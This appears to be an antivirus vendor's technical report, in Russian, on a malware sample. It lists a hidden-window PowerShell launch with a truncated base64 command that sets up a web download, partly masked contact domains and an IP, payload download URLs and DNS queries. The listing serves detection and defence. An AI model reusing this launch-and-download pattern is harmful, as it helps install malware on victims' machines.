Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABMADYANQAxAF8AMAA2AD0AKAAnAHYANgBfACcAKwAnADUAMQBfAF8AJwArACcAMgAnACkAOwAkAHIAMQBfAF8ANAA0AF8ANQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABSADEAXwA3ADEAOAA9AC...
- 'am######nhsangtheanh.com':80
- 'qn###ker.com':80
- 'qn###ker.com':443
- 'di###ietnam.com':80
- 'hu###omains.com':443
- '17#.#2.226.34':80
- 'ma####aanloop.nl':80
- 'ma####aanloop.nl':443
- http://am######nhsangtheanh.com/wp-includes/3m/
- http://qn###ker.com/cgi-bin/Ja0nQ/
- http://di###ietnam.com/wp-snapshots/OEg/
- http://ma####aanloop.nl/E9EF8C57-1871-41E0-B127-0F6A9C12088F_rwbackup/lJl6/
- 'qn###ker.com':443
- 'hu###omains.com':443
- 'ma####aanloop.nl':443
- DNS ASK am######nhsangtheanh.com
- DNS ASK qn###ker.com
- DNS ASK di###ietnam.com
- DNS ASK hu###omains.com
- DNS ASK ma####aanloop.nl
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABMADYANQAxAF8AMAA2AD0AKAAnAHYANgBfACcAKwAnADUAMQBfAF8AJwArACcAMgAnACkAOwAkAHIAMQBfAF8ANAA0AF8ANQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABSADEAXwA3ADEAOAA9AC...' (со скрытым окном)